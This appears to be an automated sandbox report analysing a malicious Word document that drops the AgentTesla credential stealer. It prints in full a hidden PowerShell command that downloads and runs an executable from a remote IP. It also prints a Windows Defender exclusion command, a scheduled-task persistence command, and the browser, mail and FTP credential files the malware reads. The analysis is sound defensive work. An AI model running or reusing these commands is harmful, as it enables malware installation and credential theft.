                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeThread delayed: delay time: 30027Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                    Source: taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                    Source: taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpBinary or memory string: vmware
                    Source: taskmg.exe, 00000009.00000002.445135938.000000000058E000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                    Source: taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    Injects a PE file into a foreign processesShow sources
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeMemory written: C:\Users\user\AppData\Roaming\taskmg.exe base: 400000 value starts with: 4D5AJump to behavior
                    Adds a directory exclusion to Windows DefenderShow sources
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exeJump to behavior
                    Injects files into Windows applicationShow sources
                    Source: C:\Windows\System32\notepad.exeInjected file: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXEJump to behavior
                    Bypasses PowerShell execution policyShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\taskmg.exe "C:\Users\user\AppData\Roaming\taskmg.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Users\user\AppData\Roaming\taskmg.exe C:\Users\user\AppData\Roaming\taskmg.exeJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeQueries volume information: C:\Users\user\AppData\Roaming\taskmg.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeQueries volume information: C:\Users\user\AppData\Roaming\taskmg.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.taskmg.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.taskmg.exe.396b420.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.taskmg.exe.39a1640.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.taskmg.exe.39a1640.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.taskmg.exe.396b420.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.442473841.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.442015388.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.704243058.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.443302064.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.446756970.000000000384A000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: taskmg.exe PID: 1156, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: taskmg.exe PID: 2784, type: MEMORYSTR
                    Tries to steal Mail credentials (via file / registry access)Show sources
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)Show sources
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                    Tries to harvest and steal ftp login credentialsShow sources
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Source: Yara matchFile source: 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: taskmg.exe PID: 2784, type: MEMORYSTR

                    Remote Access Functionality:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.taskmg.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.taskmg.exe.396b420.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.taskmg.exe.39a1640.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.taskmg.exe.39a1640.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.taskmg.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.taskmg.exe.396b420.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.442473841.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.442015388.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.704243058.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.443302064.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.446756970.000000000384A000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: taskmg.exe PID: 1156, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: taskmg.exe PID: 2784, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection211Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScripting3Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1Input Capture11System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Scripting3Security Account ManagerSecurity Software Discovery311SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsExploitation for Client Execution33Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery1Distributed Component Object ModelInput Capture11Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCommand and Scripting Interpreter11Network Logon ScriptNetwork Logon ScriptSoftware Packing13LSA SecretsVirtualization/Sandbox Evasion131SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol32Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaScheduled Task/Job1Rc.commonRc.commonMasquerading1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesPowerShell3Startup ItemsStartup ItemsVirtualization/Sandbox Evasion131DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection211Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 528737 Sample: Reconfirm The Details.doc Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 55 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->55 57 Found malware configuration 2->57 59 Sigma detected: Powershell download and execute file 2->59 61 20 other signatures 2->61 8 WINWORD.EXE 306 47 2->8         started        process3 dnsIp4 47 173.232.204.89, 49165, 49166, 80 EONIX-COMMUNICATIONS-ASBLOCK-62904US United States 8->47 39 C:\Users\user\AppData\Local\...\taskmg[1].exe, PE32 8->39 dropped 41 C:\Users\user\AppData\...\abdtfhghgeghDp .ScT, data 8->41 dropped 43 C:\Users\user\AppData\Local\...\3263CED7.png, 370 8->43 dropped 71 Document exploit detected (creates forbidden files) 8->71 73 Suspicious powershell command line found 8->73 75 Tries to download and execute files (via powershell) 8->75 77 Microsoft Office creates scripting files 8->77 13 powershell.exe 12 7 8->13         started        17 notepad.exe 8->17         started        19 powershell.exe 7 8->19         started        21 2 other processes 8->21 file5 signatures6 process7 file8 45 C:\Users\user\AppData\Roaming\taskmg.exe, PE32 13->45 dropped 87 Powershell drops PE file 13->87 23 taskmg.exe 3 13->23         started        89 Injects files into Windows application 17->89 signatures9 process10 file11 35 C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, PE32 23->35 dropped 37 C:\Users\user\AppData\Local\...\tmp3054.tmp, XML 23->37 dropped 63 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 23->63 65 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 23->65 67 Uses schtasks.exe or at.exe to add and modify task schedules 23->67 69 2 other signatures 23->69 27 taskmg.exe 10 23->27         started        31 powershell.exe 6 23->31         started        33 schtasks.exe 23->33         started        signatures12 process13 dnsIp14 49 208.91.198.143, 49174, 587 PUBLIC-DOMAIN-REGISTRYUS United States 27->49 51 208.91.199.223, 49169, 587 PUBLIC-DOMAIN-REGISTRYUS United States 27->51 53 2 other IPs or domains 27->53 79 Tries to steal Mail credentials (via file / registry access) 27->79 81 Tries to harvest and steal ftp login credentials 27->81 83 Tries to harvest and steal browser information (history, passwords, etc) 27->83 85 Installs a global keyboard hook 27->85 signatures15

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Reconfirm The Details.doc30%ReversingLabsScript.Trojan.RTFObfustream

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    14.0.taskmg.exe.400000.13.unpack100%AviraTR/Spy.Gen8Download File
                    14.0.taskmg.exe.400000.9.unpack100%AviraTR/Spy.Gen8Download File
                    14.2.taskmg.exe.400000.0.unpack100%AviraHEUR/AGEN.1143187Download File
                    14.0.taskmg.exe.400000.11.unpack100%AviraTR/Spy.Gen8Download File
                    14.0.taskmg.exe.400000.5.unpack100%AviraTR/Spy.Gen8Download File
                    14.0.taskmg.exe.400000.7.unpack100%AviraTR/Spy.Gen8Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://java.co_w0%Avira URL Cloudsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    httP://173.232.20%Avira URL Cloudsafe
                    httP://173.232.204.89/taskmg.0%Avira URL Cloudsafe
                    http://EW9kaPSTVWDzFNsliGsC.org(Zgt0%Avira URL Cloudsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    httP://173.232.204.89/t0%Avira URL Cloudsafe
                    http://173.232.204.89/taskmg.exe0%Avira URL Cloudsafe
                    http://173.232.204.890%Avira URL Cloudsafe
                    http://EW9kaPSTVWDzFNsliGsC.org0%Avira URL Cloudsafe
                    https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                    http://www.%s.comPA0%URL Reputationsafe
                    httP://173.2320%Avira URL Cloudsafe
                    http://GwvXXB.com0%Avira URL Cloudsafe
